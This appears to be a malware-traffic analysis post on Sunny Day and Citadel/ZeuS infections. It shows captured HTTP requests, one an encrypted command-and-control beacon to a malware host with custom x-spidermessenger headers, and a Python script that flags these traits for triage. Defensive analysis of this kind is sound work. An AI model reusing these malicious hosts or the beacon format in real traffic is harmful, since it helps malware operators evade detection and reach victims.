Netstream.exe Loads Sunny Day and Citadel/ZeuS Malware

PCAP file download

2016-08-25 20:40:53.651836 IP 192.168.1.102.51782 > 37.187.148.135.80: Flags [P.], seq 0:663, ack 1, win 256, length 663: HTTP: POST /cgi-bin/get_protect.cgi HTTP/1.1
E…?…..|….f%….F.P…?~…P…….POST /cgi-bin/get_protect.cgi HTTP/1.1
x-spidermessenger-crypted: 2
x-spidermessenger-crc32: 564053523
x-spidermessenger-length: 280
Content-Type: text/*
User-Agent: sun21-SunnyDay21
Host: prof.youandmeandmeandyouhihi.com
Content-Length: 386
Cache-Control: no-cache

ujXl2iaEv38JRlMCJUzLFCyglD0cQAQgE6EF56dWsz5OEBIEPEaaQ4ORDT3wc9vQbsZQLvQLyIGIKjW%2Fl4u3fdbbAMvHSB3Y8rHY6C15iy1v4T3HVwJHvnfvkcvsRH%2FwMwmTE0grv4DsJ%2ByvnMOf49J6q1ePUb8IejjsoHzBt3u6zWDwi57jEdnwDanJbVR9%2FQ6kiGKgMRlYm2VATvtoIK%2FXh1ewSC2acmrJpK8FPpDO5X4U8U%2BhVOQYKnve01SqePzC0jOBAaoCZYqrtet4eSNXBC58haWj9YO4CJ%2F4%2FM4Nav4noGSVy1Qbz81UE7k9%2BS0EqRjvZe%2FEFJL56ZEExcv7I8L7SqCbMzmWt19hp0A%3D

2016-08-25 20:40:54.267608 IP 192.168.1.102.51783 > 151.80.21.143.80: Flags [P.], seq 0:313, ack 1, win 256, length 313: HTTP: GET /cgi-bin/advert/settags?x_mode=args&x_format=javascript&x_dp_id=1203&x_pub_id=243783&tag=EN_SUNTR0021_INSTALL_F11 HTTP/1.1
E..a@……….f.P…G.P….I.a.P…….GET /cgi-bin/advert/settags?x_mode=args&x_format=javascript&x_dp_id=1203&x_pub_id=243783&tag=EN_SUNTR0021_INSTALL_F11 HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: ads.regiedepub.com
Connection: Keep-Alive

2016-08-25 20:40:54.325234 IP 192.168.1.102.51781 > 37.187.148.118.443: Flags [P.], seq 0:235, ack 1, win 256, […]
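The two HTTP requests above carry the traits an analyst would pull out of this capture for detection: a custom x-spidermessenger-* header set, a non-browser User-Agent (sun21-SunnyDay21), a wildcard Content-Type on a POST, a URL-encoded base64 body, and a second request sent by the WinHTTP automation library. The following script is an added example (not code from the original post or from the PCAP's author) that parses tcpdump -A style text into requests and applies those traits as simple triage rules. The sample input is constructed from the two requests shown above, with the IP/TCP header bytes removed and each request line on its own line; the header allowlist and rule wording are the example's own assumptions.

```python
import re
from urllib.parse import unquote

# Constructed sample: the two requests from the capture above, trimmed to the
# tcpdump summary line plus the HTTP request text (header-byte noise removed).
SAMPLE = """\
2016-08-25 20:40:53.651836 IP 192.168.1.102.51782 > 37.187.148.135.80: Flags [P.], seq 0:663, ack 1, win 256, length 663: HTTP: POST /cgi-bin/get_protect.cgi HTTP/1.1
POST /cgi-bin/get_protect.cgi HTTP/1.1
x-spidermessenger-crypted: 2
x-spidermessenger-crc32: 564053523
x-spidermessenger-length: 280
Content-Type: text/*
User-Agent: sun21-SunnyDay21
Host: prof.youandmeandmeandyouhihi.com
Content-Length: 386
Cache-Control: no-cache

ujXl2iaEv38JRlMCJUzLFCyglD0cQAQgE6EF56dWsz5OEBIEPEaaQ4ORDT3wc9vQbsZQLvQLyIGIKjW%2Fl4u3fdbbAMvHSB3Y8rHY6C15iy1v4T3HVwJHvnfvkcvsRH%2FwMwmTE0grv4DsJ%2ByvnMOf49J6q1ePUb8IejjsoHzBt3u6zWDwi57jEdnwDanJbVR9%2FQ6kiGKgMRlYm2VATvtoIK%2FXh1ewSC2acmrJpK8FPpDO5X4U8U%2BhVOQYKnve01SqePzC0jOBAaoCZYqrtet4eSNXBC58haWj9YO4CJ%2F4%2FM4Nav4noGSVy1Qbz81UE7k9%2BS0EqRjvZe%2FEFJL56ZEExcv7I8L7SqCbMzmWt19hp0A%3D
2016-08-25 20:40:54.267608 IP 192.168.1.102.51783 > 151.80.21.143.80: Flags [P.], seq 0:313, ack 1, win 256, length 313: HTTP: GET /cgi-bin/advert/settags?x_mode=args&x_format=javascript&x_dp_id=1203&x_pub_id=243783&tag=EN_SUNTR0021_INSTALL_F11 HTTP/1.1
GET /cgi-bin/advert/settags?x_mode=args&x_format=javascript&x_dp_id=1203&x_pub_id=243783&tag=EN_SUNTR0021_INSTALL_F11 HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: ads.regiedepub.com
Connection: Keep-Alive

"""

# A packet starts at a line beginning with a tcpdump timestamp followed by "IP".
PKT_SPLIT = re.compile(r"(?m)^(?=\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}\.\d+ IP )")
SUMMARY = re.compile(r"^(\S+ \S+) IP (\S+) > (\S+):")
REQ_LINE = re.compile(r"(GET|POST|HEAD|PUT|DELETE|OPTIONS) (\S+) HTTP/1\.[01]\s*$")
B64 = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")

# Assumed allowlist: common x- headers that are not worth flagging on their own.
KNOWN_X_HEADERS = {"x-requested-with", "x-forwarded-for", "x-real-ip", "x-csrf-token"}


def parse_requests(text):
    """Split tcpdump -A text into HTTP requests: summary fields, headers, body."""
    requests = []
    for chunk in PKT_SPLIT.split(text):
        lines = chunk.splitlines()
        if not lines:
            continue
        m = SUMMARY.match(lines[0])
        if not m:
            continue
        ts, src, dst = m.groups()
        start = None
        for i, line in enumerate(lines[1:], start=1):  # skip the summary line
            r = REQ_LINE.search(line)
            if r:
                start = i
                break
        if start is None:
            continue  # not an HTTP request payload
        req = {"ts": ts, "src": src, "dst": dst, "method": r.group(1),
               "uri": r.group(2), "headers": {}, "body": ""}
        j = start + 1
        while j < len(lines) and lines[j].strip():  # headers end at a blank line
            name, _, value = lines[j].partition(":")
            req["headers"][name.strip().lower()] = value.strip()
            j += 1
        req["body"] = "\n".join(lines[j + 1:]).strip()
        requests.append(req)
    return requests


def inspect(req):
    """Return a list of human-readable findings for one parsed request."""
    findings = []
    h = req["headers"]
    odd = sorted(n for n in h if n.startswith("x-") and n not in KNOWN_X_HEADERS)
    if odd:
        findings.append("non-standard request headers: " + ", ".join(odd))
    ua = h.get("user-agent", "")
    if not ua.startswith("Mozilla/"):
        findings.append(f"non-browser user-agent: {ua!r}")
    elif "WinHttp.WinHttpRequest" in ua:
        findings.append("WinHTTP automation user-agent")
    # A wildcard media type is never a valid request Content-Type.
    if req["method"] == "POST" and h.get("content-type", "").endswith("/*"):
        findings.append("wildcard Content-Type on a POST")
    # A body that URL-decodes to pure base64 is an opaque blob, not form data.
    if req["body"] and B64.match(unquote(req["body"])):
        findings.append(f"opaque base64 body ({len(req['body'])} bytes URL-encoded)")
    return findings


def triage(text):
    """Summarise every request as (dst, Host, method, path, findings)."""
    return [(r["dst"], r["headers"].get("host", ""), r["method"],
             r["uri"].split("?")[0], inspect(r)) for r in parse_requests(text)]


if __name__ == "__main__":
    for dst, host, method, path, findings in triage(SAMPLE):
        print(f"{method} {host}{path} -> {dst}")
        for f in findings:
            print("   -", f)
```

Run against the sample, the first request collects four findings and the second only the WinHTTP note, which is the split an analyst would expect: the beaconing POST is the one worth a signature (Host plus the x-spidermessenger-* header names), while the ad-tag GET is the accompanying affiliate traffic.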